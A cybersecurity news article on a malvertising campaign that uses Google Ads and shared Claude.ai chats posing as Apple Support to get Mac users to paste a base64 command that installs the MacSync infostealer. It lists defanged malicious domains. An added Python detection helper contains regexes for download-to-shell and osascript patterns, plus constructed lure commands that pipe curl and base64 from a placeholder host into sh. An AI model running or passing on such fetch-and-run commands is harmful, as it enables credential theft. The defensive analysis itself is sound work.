As AI advances unpredictably, cyber criminals change their attack patterns too, which makes cyber resilience harder to maintain. Attackers are abusing Google Ads and legitimate Claude.ai shared chats in an active malicious advertising campaign.
Users searching for “Claude mac download” may see ads that present claude.ai as the site to visit. The shared chat they land on, however, walks them through steps that put malware on their Mac.

Shared Claude Chats weaponized to target macOS users
The campaign was discovered by Berk Albayrak, a security expert at Trendyol Group, who posted his findings on LinkedIn.
Albayrak found a Claude.ai shared chat that claims to be an official “Claude Code on Mac” guide from “Apple Support.” The chat instructs users to open Terminal and paste a command, which silently downloads and runs malware on their Mac.

BleepingComputer reported that, while verifying Albayrak’s findings, it landed on a second shared Claude chat carrying out the same attack through entirely separate infrastructure.
The two chats follow an identical structure and social engineering approach but use different domains and payloads. Both chats were publicly accessible at the time of writing:

What does the macOS malware do?
The base64-encoded command shown in the shared Claude chat downloads an encoded shell script from domains such as:
In the variant seen by Albayrak [VirusTotal]: hxxp://customroofingcontractors[.]com/curl/b42a0ed9d1ecb72e42d6034502c304845d98805481d99cea4e259359f9ab206e
In the variant seen by BleepingComputer [VirusTotal]: hxxps://bernasibutuwqu2[.]com/debug/loader.sh?build=a39427f9d5bfda11277f1a58c89b7c2d
The ‘loader.sh’ (served by the second link above) is another layer of gzip-compressed shell instructions:

This script runs entirely in memory, leaving little evidence on disk.
BleepingComputer observed that the server returned a differently obfuscated version of the payload on each request. This technique is called polymorphic delivery, and it makes it harder for security tools to detect the download by a known hash or signature.
The variant BleepingComputer identified starts by checking whether the machine has Russian or CIS-region keyboard input sources configured. If it does, the script exits without doing anything, sending a quiet cis_blocked status ping to the attacker’s server on its way out. Only machines that pass this check get the next stage:

Before proceeding, the script gathers the victim’s external IP address, hostname, OS version, and keyboard settings, then sends this information to the attacker. Profiling the victim before delivering the payload shows that the attackers are selective about whom they target.
The script then downloads a second-stage payload and runs it with osascript, macOS’s built-in scripting tool. This lets the attacker execute code remotely without installing a conventional app or binary.
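The behaviours described above (a base64 blob the user is told to paste into Terminal, a gzip-wrapped loader, per-request re-encoding that defeats hash matching, a keyboard-layout check, and execution via osascript) are all things a defender can look for before a pasted command is allowed to run. The following Python triage helper is an added example, not code from this article, from BleepingComputer or from Albayrak: it peels the base64 and gzip layers off a one-liner, fingerprints the innermost script after whitespace normalisation so that re-encoding does not change the fingerprint, and flags the reported behaviours. All inputs are constructed; domains use the reserved example.invalid TLD as placeholders, and the keyboard-check indicator assumes the script reads the HIToolbox input-source preference keys (a common way to list macOS keyboard layouts; the article does not show the actual check).

```python
"""Triage helper for pasted-in-Terminal lures (added example, not the article's code).

Peels base64/gzip wrapping layers off a suspicious one-liner, fingerprints the
innermost script after whitespace normalisation (so per-request re-encoding
does not change the fingerprint) and flags reported behaviours: a download
piped into a shell, osascript execution, and keyboard input-source checks.
Sample inputs are constructed; domains use the reserved example.invalid TLD.
"""
import base64
import binascii
import gzip
import hashlib
import re

# Behaviours worth flagging in a command a user is told to paste into Terminal.
# The HIToolbox keys are an assumption about how a layout check would look.
INDICATORS = {
    "download_piped_to_shell": re.compile(r"\bcurl\b.*\|\s*(ba|z)?sh\b"),
    "base64_decode_to_shell": re.compile(r"\bbase64\s+(-d|-D|--decode)\b.*\|\s*(ba|z)?sh\b"),
    "osascript_execution": re.compile(r"\bosascript\b"),
    "keyboard_layout_check": re.compile(r"HIToolbox|Apple(Enabled|Selected)InputSources"),
}

# A base64 run long enough to carry a script rather than a short token.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def _decode_one_layer(text):
    """Return the first base64 run in `text` that decodes (optionally through
    gzip, as loader.sh does) to readable script text, or None if none does."""
    for match in B64_RUN.finditer(text):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue
        if raw[:2] == b"\x1f\x8b":  # gzip magic bytes
            try:
                raw = gzip.decompress(raw)
            except (OSError, EOFError):
                continue
        try:
            decoded = raw.decode("utf-8")
        except UnicodeDecodeError:
            continue
        if decoded and all(c.isprintable() or c.isspace() for c in decoded):
            return decoded
    return None


def unwrap(text, max_depth=5):
    """Outer command first, then each successively decoded inner layer."""
    layers = [text]
    for _ in range(max_depth):
        inner = _decode_one_layer(layers[-1])
        if inner is None:
            break
        layers.append(inner)
    return layers


def normalized_hash(script):
    """SHA-256 of the script with blank lines dropped and whitespace collapsed,
    so differently wrapped copies of one script share a fingerprint."""
    norm = "\n".join(" ".join(l.split()) for l in script.splitlines() if l.strip())
    return hashlib.sha256(norm.encode()).hexdigest()


def triage(command):
    """Decode every layer of `command` and report indicators found in any of them."""
    layers = unwrap(command)
    hits = sorted(n for n, rx in INDICATORS.items() if rx.search("\n".join(layers)))
    return {
        "layers": len(layers),
        "surface_sha256": hashlib.sha256(command.encode()).hexdigest(),
        "normalized_sha256": normalized_hash(layers[-1]),
        "indicators": hits,
        "verdict": "suspicious" if hits else "no indicators",
    }


# Constructed inner script standing in for a decoded stage; nothing here resolves.
INNER = (
    "defaults read ~/Library/Preferences/com.apple.HIToolbox AppleEnabledInputSources\n"
    "curl -fsSL http://stage2.example.invalid/loader.sh | sh\n"
    "osascript -e 'display dialog \"constructed stage-2 placeholder\"'\n"
)


def build_samples():
    """Two wrappings of the same INNER (plain base64; gzip then base64), which
    mimic per-request re-encoding, plus a benign decode with no shell pipe."""
    plain = base64.b64encode(INNER.encode()).decode()
    gz = base64.b64encode(gzip.compress(INNER.encode(), mtime=0)).decode()
    return {
        "variant_a": f"echo {plain} | base64 -d | sh",
        "variant_b": f"echo {gz} | base64 -d | gunzip | sh",
        "benign": "echo SGVsbG8sIHdvcmxkIQ== | base64 -d",
    }


if __name__ == "__main__":
    for name, cmd in build_samples().items():
        r = triage(cmd)
        print(f"{name}: {r['verdict']}, layers={r['layers']}, "
              f"indicators={r['indicators']}, fingerprint={r['normalized_sha256'][:16]}")
```

The two constructed lures have different surface hashes (which is why a hash blocklist misses a polymorphic server) but the same normalised fingerprint once unwrapped, and both trip every indicator; the benign decode trips none. The regexes are deliberately narrow heuristics for pasted one-liners, not a general malware classifier.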
The variant found by Albayrak appears to skip the profiling steps and goes straight to execution. It collects browser usernames and passwords, cookies, and macOS Keychain data, bundles them, and sends them to the attacker’s server. Albayrak identified this as a variant of the MacSync macOS infostealer:

The briskinternet[.]com domain shown above in the variant identified by Albayrak appeared to be down at the time of writing. Read BleepingComputer’s full report for further details.
InfoSecBulletin Cybersecurity for mankind
